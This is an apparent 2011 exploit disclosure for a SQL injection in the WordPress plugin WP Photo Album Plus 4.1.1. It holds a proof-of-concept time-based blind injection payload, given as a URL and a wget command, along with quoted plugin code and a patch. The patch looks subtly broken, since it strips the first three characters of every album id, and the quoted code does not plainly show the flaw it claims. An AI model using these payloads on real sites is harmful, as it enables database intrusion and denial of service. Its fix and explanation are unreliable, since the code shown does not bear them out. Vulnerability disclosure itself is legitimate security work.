WordPress Photo Album Plus <= 4.1.1 SQL Injection Vulnerability

# Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability # Date: 2011-10-14 # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo) # Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/ # Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip # Version: 4.1.1 (tested) --------------- PoC (POST data) --------------- http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 e.g. wget http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 --------------- Vulnerable code --------------- Line 490 of wppa-functions.php: if (($occur == $ref_occur) && wppa_get_get('album')) { $id = wppa_get_get('album'); $wppa['is_cover'] = wppa_get_get('cover'); } ... ... if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); $albums = $wpdb->get_results($q, 'ARRAY_A'); Line 3170 of wppa-functions.php: function wppa_get_get($index, $default = false) { if (isset($_GET['wppa-'.$index])) { // New syntax first return $_GET['wppa-'.$index]; } if (isset($_GET[$index])) { // Old syntax return $_GET[$index]; } return $default; } --------------- Patch --------------- *** ./wppa-functions.php 2011-10-14 19:15:11.574775456 -0400 --- ./wppa-functions.php.new 2011-10-14 19:13:14.735784321 -0400 *************** *** 506,513 **** // Top-level album has no cover if ($id == '0') $wppa['is_cover'] = '0'; - // Do the query if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); --- 506,513 ---- // Top-level album has no cover if ($id == '0') $wppa['is_cover'] = '0'; // Do the query + $id=substr($id,3); if (is_numeric($id)) { if ($wppa['is_cover']) $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `id`= %s', $id); else $q = $wpdb->prepare('SELECT * FROM ' . WPPA_ALBUMS . ' WHERE `a_parent`= %s '. wppa_get_album_order(), $id); *************** *** 3384,3387 **** global $wppa; if ( $wppa['any'] ) echo $wppa['searchresults']; ! } \ No newline at end of file --- 3384,3387 ---- global $wppa; if ( $wppa['any'] ) echo $wppa['searchresults']; ! }